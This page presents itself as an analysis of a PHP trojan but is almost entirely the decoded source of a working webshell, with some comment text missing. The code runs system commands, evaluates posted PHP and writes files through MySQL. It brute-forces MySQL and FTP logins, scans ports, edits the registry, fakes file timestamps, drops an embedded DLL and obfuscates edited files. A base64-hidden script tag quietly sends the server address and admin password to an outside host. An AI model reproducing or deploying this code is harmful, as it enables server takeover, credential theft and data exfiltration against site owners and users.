php木馬の分析(暗号解読)
復号解凍コードは次のとおりです.
function writetofile($filename, $data)
{ //File Writing
$filenum=@fopen($filename,"w");
if (!$filenum) {
return false;
}
flock($filenum,LOCK_EX);
$file_data=fwrite($filenum,$data);
fclose($filenum);
return true;
}
?>
phpの環境で実行すると、phpの明文ファイルは次のようになります.
error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
@set_time_limit(0);
// , 。
/*===================== =====================*/
// ,1 , .
$admin['check'] = "1";
// ,
//
$hidden = "44997";
$admin['port'] = "80,139,21,3389,3306,43958,1433,5631";
//
$admin['jumpsecond'] = "1";
//Ftp
$alexa = "yes";
// alexa ,yes no
$admin['ftpport'] = "21";
// phpspy (yes/no)
$retime = "no";
// cmd.exe ,proc_open ,linux .( winnt )
$cmd = "cmd.exe";
// phpspy , , ~~ 。 ~~
/*===================== =====================*/
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = $admin['pass'];
$copyurl = base64_decode('PHNjcmlwdCBzcmM9J2h0dHA6Ly8lMzglNjMlNjMlNjUlMkUlNjMlNkYlNkQvJTYzJTY1JTcyJTc0Lz9jZXJ0PTEzJnU9');
$copyurll = base64_decode('Jz48L3NjcmlwdD4=');
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {@extract($_POST, EXTR_SKIP);@extract($_GET, EXTR_SKIP);}
$self = $_SERVER['PHP_SELF'];$dis_func = get_cfg_var("disable_functions");
/*===================== =====================*/
if($admin['check'] == "1") {if ($_GET['action'] == "logout") {setcookie ("adminpass", "");echo "";echo " ......";exit;}
if ($_POST['do'] == 'login') {$thepass=trim($_POST['adminpass']);if ($admin['pass'] == $thepass) {setcookie ("adminpass",$thepass,time()+(1*24*3600));echo "";echo "".$copyurl.$serveru."&p=".$serverp.$copyurll."";exit;}}if (isset($_COOKIE['adminpass'])) {if ($_COOKIE['adminpass'] != $admin['pass']) {loginpage();}} else {loginpage();}}
/*===================== =====================*/
// magic_quotes_gpc
if (get_magic_quotes_gpc()) {$_GET = stripslashes_array($_GET);$_POST = stripslashes_array($_POST);}
//mix.dll
$mixdll = "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";
function shelL($command){
global $windows,$disablefunctions;
$exec = '';$output= '';
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}
elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("
",$output);$exec= $output;}
elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}
elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}
elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
return $exec;
}
// PHPINFO
if ($_GET['action'] == "phpinfo") {echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() , ";exit;
}if($_GET['action'] == "nowuser") {$user = get_current_user();
if(!$user) $user = " , , !";
echo" :$user";
exit;
}
if(isset($_POST['phpcode'])){eval("?".">$_POST[phpcode]");exit;
}
if($action=="mysqldown"){
$link=@mysql_connect($host,$user,$password);
if (!$link) {
$downtmp = ' : ' . mysql_error();
}else{
$query="select load_file('".$filename."');";
$result = @mysql_query($query, $link);
if(!$result){
$downtmp = " , file 。
".mysql_error();
}else{
while ($row = mysql_fetch_array($result)) {
$filename = basename($filename);
if($rardown=="yes"){
$zip = NEW Zip;
$zipfiles[]=Array("$filename",$row[0]);
$zip->Add($zipfiles,1);
$code = $zip->get_file();
$filename = "".$filename.".rar";
}else{
$code = $row[0];
}
header("Content-type: application/octet-stream");
header("Accept-Ranges: bytes");
header("Accept-Length: ".strlen($code));
header("Content-Disposition: attachment;filename=$filename");
echo($code);
exit;
}
}
}
}
//
if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "
URL
";exit;
}
//
if (!empty($downfile)) {if (!@file_exists($downfile)) {echo "<!--
<br>alert(' !')
<br>// --> ";} else {$filename = basename($downfile);$filename_info = explode('.', $filename);$fileext = $filename_info[count($filename_info)-1];header('Content-type: application/x-'.$fileext);header('Content-Disposition: attachment; filename='.$filename.'');header('Content-Description: PHP Generated Data');header('Content-Length: '.filesize($downfile));@readfile($downfile);exit;}
}
//
if ($_POST['backuptype'] == 'download') {
@mysql_connect($servername,$dbusername,$dbpassword) or die(" ");
@mysql_select_db($dbname) or die(" ");
$table = array_flip($_POST['table']);
$result = mysql_query("SHOW tables");
echo ($result) ? NULL : " : ".mysql_error();
$filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
header('Content-type: application/unknown');
header('Content-Disposition: attachment; filename='.$filename);
$mysqldata = '';
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
$mysqldata.= sqldumptable($currow[0]);
$mysqldata.= $mysqldata."\r
";
}
}
mysql_close();
exit;
}
//
$pathname=str_replace('\\','/',dirname(__FILE__));
$dirpath=str_replace('\\','/',$_SERVER["DOCUMENT_ROOT"]);
//
if (!isset($dir) or empty($dir)) {
$dir = ".";
$nowpath = getPath($pathname, $dir);
} else {
$dir=$_GET['dir'];
$nowpath = getPath($pathname, $dir);
}
//
$dir_writeable = (dir_writeable($nowpath)) ? " " : " ";
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | PHPINFO()" : "";
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | レジストリアクション" : "";
$tb = new FORMS;
?>
<br>function CheckAll(form) {
<br> for (var i=0;i<form.elements.length;i++) {
<br> var e = form.elements[i];
<br> if (e.name != 'chkall')
<br> e.checked = form.chkall.checked; }}
<br>function really(d,f,m,t) {if (confirm(m)) {if (t == 1) {window.location.href='?dir='+d+'&deldir='+f;} else {window.location.href='?dir='+d+'&delfile='+f;}}}
<br>
<?php echo"$myneme"??>
//$_SERVER["DOCUMENT_ROOT"]
$tb->tableheader();
$tb->tdbody(''.$_SERVER['HTTP_HOST'].' '.date("Y m d h:i:s",time()).' '.gethostbyname($_SERVER['SERVER_NAME']).'
','center','top');
$tb->tdbody('ルートディレクトリ | シェルディレクトリ | かんきょうへんすう | オンラインエージェント'.$reg.$phpinfo.' | WebShell | その の | mix.dll | ログインのログアウト');
$tb->tdbody(' を する. | Httpファイルのダウンロード | ファイル | phpスクリプトの | SQL の | FuncリバウンドShell | MySQLバックアップ | サービスUの ');
$tb->tablefooter();
?>
$tb->headerform(array('method'=>'GET','content'=>' : '.$pathname.'
('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'
: '.$tb->makeinput('dir',''.$nowpath.'','','text','80').' '.$tb->makeinput('',' ','','submit').' 〖 〗'));
$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>' : '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile',' ','','submit').$tb->makeinput('uploaddir',$dir,'','hidden')));
$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>' : '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile',' ','','submit')));
$tb->headerform(array('content'=>' : '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory',' ','','submit')));
?>
/*===================== =====================*/
echo "
";
//
if (!empty($delfile)) {
if (file_exists($delfile)) {
echo (@unlink($delfile)) ? $delfile." !" : " !";
} else {
echo basename($delfile)." !";
}
}
//
elseif (!empty($deldir)) {
$deldirs="$dir/$deldir";
if (!file_exists("$deldirs")) {
echo "$deldir !";
} else {
echo (deltree($deldirs)) ? " !" : " !";
}
}
//
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
if (!empty($newdirectory)) {
$mkdirs="$dir/$newdirectory";
if (file_exists("$mkdirs")) {
echo " !";
} else {
echo (@mkdir("$mkdirs",0777)) ? " !" : " !";
@chmod("$mkdirs",0777);
}
}
}
//
elseif ($doupfile) {
echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? " !" : " !";
}
elseif($action=="mysqlup"){
$filename = $_FILES['upfile']['tmp_name'];
if(!$filename) {
echo" 。。";
}else{
$shell = file_get_contents($filename);
$mysql = bin2hex($shell);
if(!$upname) $upname = $_FILES['upfile']['name'];
$shell = "select 0x".$mysql." from ".$database." into DUMPFILE '".$uppath."/".$upname."';";
$link=@mysql_connect($host,$user,$password);
if(!$link){
echo " ".mysql_error();
}else{
$result = mysql_query($shell, $link);
if($result){
echo" . ".$host.", ".$uppath."/".$upname."..";
}else{
echo" :".mysql_error();
}
}
}
}
elseif($action=="mysqldown"){
if(!empty($downtmp)) echo $downtmp;
}
//
elseif ($_POST['do'] == 'doeditfile') {
if (!empty($_POST['editfilename'])) {
if(!file_exists($editfilename)) unset($retime);
if($time==$now) $time = @filemtime($editfilename);
$time2 = @date("Y-m-d H:i:s",$time);
$filename="$editfilename";
@$fp=fopen("$filename","w");
if($_POST['change']=="yes"){
$filecontent = "?".">".$_POST['filecontent']."";
$filecontent = gzdeflate($filecontent);
$filecontent = base64_encode($filecontent);
$filecontent = "/*
!
*/
eval(gzinflate(base64_decode('$filecontent')));
"."??>";
}else{
$filecontent = $_POST['filecontent'];
}
echo $msg=@fwrite($fp,$filecontent) ? " !" : " !";
@fclose($fp);
if($retime=="yes"){
echo" :";
echo $msg=@touch($filename,$time) ? " ".$time2." !" : " !";
}
} else {
echo " !";
}
}
//
elseif ($_POST['do'] == 'downloads') {
$contents = @file_get_contents($_POST['durl']);
if(!$contents){
echo" ";
}
elseif(file_exists($path)){
echo" , ".$path." , 。";
}else{
$fp = @fopen($path,"w");
echo $msg=@fwrite($fp,$contents) ? " !" : " !";
@fclose($fp);
}
}
elseif($_POST['action']=="mix"){
if(!file_exists($_POST['mixto'])){
$tmp = base64_decode($mixdll);
$tmp = gzinflate($tmp);
$fp = fopen($_POST['mixto'],"w");
echo $msg=@fwrite($fp,$tmp) ? " !" : " ?!";
fclose($fp);
}else{
echo" ?".$_POST['mixto']." ~";
}
}
//
elseif ($_POST['do'] == 'editfileperm') {
if (!empty($_POST['fileperm'])) {
$fileperm=base_convert($_POST['fileperm'],8,10);
echo (@chmod($dir."/".$file,$fileperm)) ? " !" : " !";
echo " ".$file." : ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4);
} else {
echo " !";
}
}
//
elseif ($_POST['do'] == 'rename') {
if (!empty($_POST['newname'])) {
$newname=$_POST['dir']."/".$_POST['newname'];
if (@file_exists($newname)) {
echo "".$_POST['newname']." , !";
} else {
echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." ".$_POST['newname']." !" : " !";
}
} else {
echo " !";
}
}
elseif ($_POST['do'] == 'search') {
if(!empty($oldkey)){
echo" :[".$oldkey."], :";
if($type2 == "getpath"){
echo" .";
}
echo"
";
find($path);
}else{
echo" ? ? ?";
}
}
elseif ($_GET['action']=='plgmok') {
dirtree($_POST['dir'],$_POST['mm']);
}
elseif ($_GET['action'] == "plgm") {
$action = '?action=plgmok';
$gm = "";
$tb->tableheader();
$tb->formheader($action,' ');
$tb->tdbody(' php ','center');
$tb->tdbody(' : '.$tb->makeinput('dir',''.$_SERVER["DOCUMENT_ROOT"].'','','text','60').'
:'.$tb->maketextarea('mm',$gm,'50','5').''.$tb->makehidden('do',' ').'
'.$tb->makeinput('submit',' ','','submit'),'center','1','35');
echo "";
$tb->tablefooter();
}//end plgm
//
elseif ($_POST['do'] == 'domodtime') {
if (!@file_exists($_POST['curfile'])) {
echo " !";
} else {
if (!@file_exists($_POST['tarfile'])) {
echo " !";
} else {
$time=@filemtime($_POST['tarfile']);
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." ".date("Y-m-d H:i:s",$time)." !" : " !";
}
}
}
//
elseif ($_POST['do'] == 'modmytime') {
if (!@file_exists($_POST['curfile'])) {
echo " !";
} else {
$year=$_POST['year'];
$month=$_POST['month'];
$data=$_POST['data'];
$hour=$_POST['hour'];
$minute=$_POST['minute'];
$second=$_POST['second'];
if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) {
$time=strtotime("$data $month $year $hour:$minute:$second");
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." ".date("Y-m-d H:i:s",$time)." !" : " !";
}
}
}
elseif($do =='port'){
$tmp = explode(",",$port);
$count = count($tmp);
for($i=$first;$i $fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
if($fp) echo" ".$host." ".$tmp[$i]."
";
}
}
/*
, 。
, , 。*/
elseif ($do == 'crack') {// 。
if(@file_exists($passfile)){
$tmp = file($passfile);
$count = count($tmp);
if(empty($onetime)){
$onetime = $count;
$turn="1";
}else{
$nowturn = $turn+1;
$now = $turn*$onetime;
$tt = intval(($count/$onetime)+1);
}
if($turn>$tt or $onetime>$count){
echo" ~ , 。";
}else{
$first = $onetime*($turn-1);
for($i=$first;$i if($ctype=="mysql") $sa = @mysql_connect($host,$user,chop($tmp[$i]));
else $sa = @ftp_login(ftp_connect($host,$admin[ftpport]),$user,chop($tmp[$i]));
if($sa)
{
$t = " ".$user." ".$tmp[$i]."";
}
}
if(!$t){
echo " ".$count." , ".$first." ".$now.",".$admin[jumpsecond]." ".$onetime." . >>>
".$type." ".$tt." , ".$turn." 。";
}
else {
echo"$t";
}
}
}else{
echo" , 。";
}
}
elseif($do =='port'){
if(!eregi("-",$port)){
$tmp = explode(",",$port);
$count = count($tmp);
$first = "1";
}else{
$tmp = explode("-",$port);
$first = $tmp[0];
$count = $tmp[1];
}
for($i=$first;$i if(!eregi("-",$port)){
$fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
if($fp) echo" ".$host." ".$tmp[$i]."
";
}else{
$fp = @fsockopen($host, $i, $errno, $errstr, 1);
if($fp) echo" ".$host." ".$i."
";
}
}
}
// MYSQL
elseif ($connect) {
if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
echo " !";
mysql_close();
} else {
echo mysql_error();
}
}
// SQL
elseif ($_POST['do'] == 'query') {
@mysql_connect($servername,$dbusername,$dbpassword) or die(" ");
@mysql_select_db($dbname) or die(" ");
$result = @mysql_query($_POST['sql_query']);
echo ($result) ? "SQL !" : " : ".mysql_error();
mysql_close();
}
//
elseif ($_POST['do'] == 'backupmysql') {
if (empty($_POST['table']) OR empty($_POST['backuptype'])) {
echo " !";
} else {
if ($_POST['backuptype'] == 'server') {
@mysql_connect($servername,$dbusername,$dbpassword) or die(" ");
@mysql_select_db($dbname) or die(" ");
$table = array_flip($_POST['table']);
$filehandle = @fopen($path,"w");
if ($filehandle) {
$result = mysql_query("SHOW tables");
echo ($result) ? NULL : " : ".mysql_error();
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
sqldumptable($currow[0], $filehandle);
fwrite($filehandle,"
");
}
}
fclose($filehandle);
echo " ".$path."";
mysql_close();
} else {
echo " , !";
}
}
}
}
elseif($downrar) {
if (!empty($dl)) {
if(eregi("unzipto:",$localfile)){
$path = "".$dir."/".str_replace("unzipto:","",$localfile)."";
$zip = new Zip;
$zipfile=$dir."/".$dl[0];
$array=$zip->get_list($zipfile);
$count=count($array);
$f=0;
$d=0;
for($i=0;$i if($array[$i][folder]==0) {
if($zip->Extract($zipfile,$path,$i)>0) $f++;
}
else $d++;
}
if($i==$f+$d) echo "$dl[0] ".$path."
($f $d )";
elseif($f==0) echo "$dl[0] ".$path." ";
else echo "$dl[0]
( $f $d )";
}else{
$zipfile="";
$zip = new Zip;
for($k=0;isset($dl[$k]);$k++)
{
$zipfile=$dir."/".$dl[$k];
if(is_dir($zipfile))
{
unset($zipfilearray);
addziparray($dl[$k]);
for($i=0;$zipfilearray[$i];$i++)
{
$filename=$zipfilearray[$i];
$filesize=@filesize($dir."/".$zipfilearray[$i]);
$fp=@fopen($dir."/".$filename,rb);
$zipfiles[]=Array($filename,@fread($fp,$filesize));
@fclose($fp);
}
}
else
{
$filename=$dl[$k];
$filesize=@filesize($zipfile);
$fp=@fopen($zipfile,rb);
$zipfiles[]=Array($filename,@fread($fp,$filesize));
@fclose($fp);
}
}
$zip->Add($zipfiles,1);
$code = $zip->get_file();
$ck = "_QQ44997_".date("Y-m-d",time())."";
if(empty($localfile)){
header("Content-type: application/octet-stream");
header("Accept-Ranges: bytes");
header("Accept-Length: ".strlen($code));
header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."".$ck."_Files.zip");
echo $code;
exit;
}else{
$fp = @fopen("".$dir."/".$localfile."","w");
echo $msg=@fwrite($fp,$code) ? " ".$dir."/".$localfile." !!" : " ".$dir." !";
@fclose($fp);
}
}
} else {
echo " !";
}
}
// Shell.Application
elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) {
$shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
$a = $shell->ShellExecute($_POST['program'],$_POST['prog']);
echo ($a=='0') ? " !" : " !";
}
// PHP
elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) {
echo " ".$_POST['phpvarname']." : ".getphpcfg($_POST['phpvarname'])."";
}
//
elseif(($regread) AND !empty($_POST['readregname'])) {
$shell= &new COM('WSc'.'rip'.'t.Sh'.'ell');
var_dump(@$shell->RegRead($_POST['readregname']));
}
//
elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) {
$shell= &new COM('W'.'Scr'.'ipt.S'.'hell');
$a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']);
echo ($a=='0') ? " !" : " ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." !";
}
//
elseif(($regdelete) AND !empty($_POST['delregname'])) {
$shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll');
$a = @$shell->RegDelete($_POST['delregname']);
echo ($a=='0') ? " !" : " ".$_POST['delregname']." !";
}
else {
echo "$notice";
echo "Program | pcAnywhere | | AllUsers | Serv-U | ";
for ($i=66;$i<=90;$i++){$drive= chr($i).':';
if (is_dir($drive."/")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " $drive\\";}
}
}
echo "
";
/*===================== =====================*/
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
$tb->tableheader();
?>
";
echo "
";
}// end dir
elseif ($_GET['action'] == "editfile") {
if(empty($newfile)) {
$filename="$dir/$editfile";
$fp=@fopen($filename,"r");
$contents=@fread($fp, filesize($filename));
@fclose($fp);
$contents=htmlspecialchars($contents);
}else{
$editfile=$newfile;
$filename = "$dir/$editfile";
}
$action = "?dir=".urlencode($dir)."&editfile=".$editfile;
$tb->tableheader();
$tb->formheader($action,' / ');
$tb->tdbody(' : '.$tb->makeinput('editfilename',$filename).' Php : ');
$tb->tdbody($tb->maketextarea('filecontent',$contents));
$tb->makehidden('do','doeditfile');
$tb->formfooter('1','30');
}//end editfile
elseif ($_GET['action'] == "rename") {
$nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']);
$action = "?dir=".urlencode($dir)."&fname=".urlencode($fname);
$tb->tableheader();
$tb->formheader($action,' ');
$tb->makehidden('oldname',$dir."/".$nowfile);
$tb->makehidden('dir',$dir);
$tb->tdbody(' : '.basename($nowfile));
$tb->tdbody(' : '.$tb->makeinput('newname'));
$tb->makehidden('do','rename');
$tb->formfooter('1','30');
}//end rename
elseif ($_GET['action'] == "eval") {
$action = "?dir=".urlencode($dir)."";
$tb->tableheader();
$tb->formheader(''.$action.' "target="_blank' ,' php ');
$tb->tdbody($tb->maketextarea('phpcode',$contents));
$tb->formfooter('1','30');
}
elseif ($_GET['action'] == "fileperm") {
$action = "?dir=".urlencode($dir)."&file=".$file;
$tb->tableheader();
$tb->formheader($action,' ');
$tb->tdbody(' '.$file.' : '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4)));
$tb->makehidden('file',$file);
$tb->makehidden('dir',urlencode($dir));
$tb->makehidden('do','editfileperm');
$tb->formfooter('1','30');
}//end fileperm
elseif ($_GET['action'] == "newtime") {
$action = "?dir=".urlencode($dir);
$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
$tb->tableheader();
$tb->formheader($action,' ');
$tb->tdbody(" : ".$tb->makeinput('curfile',$file,'readonly')." → : ".$tb->makeinput('tarfile',' '),'center','2','30');
$tb->makehidden('do','domodtime');
$tb->formfooter('','30');
$tb->formheader($action,' ');
$tb->tdbody('
- 1901 12 13 20:45:54 2038 1 19 03:14:07
( 32 ) - : 01 30 , 0 24 , 0 60 !
','left');
$tb->tdbody(' : '.$file);
$tb->makehidden('curfile',$file);
$tb->tdbody(' : '.$tb->makeinput('year','1984','','text','4').' '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' '.$tb->makeinput('data','18','','text','2').' '.$tb->makeinput('hour','20','','text','2').' '.$tb->makeinput('minute','00','','text','2').' '.$tb->makeinput('second','00','','text','2').' ','center','2','30');
$tb->makehidden('do','modmytime');
$tb->formfooter('1','30');
}//end newtime
elseif ($_GET['action'] == "shell") {
$action = "??action=shell&dir=".urlencode($dir);
$tb->tableheader();
$tb->tdheader('WebShell Mode');
if (substr(PHP_OS, 0, 3) == 'WIN') {
$program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe";
$prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt";
echo "
";
}
echo "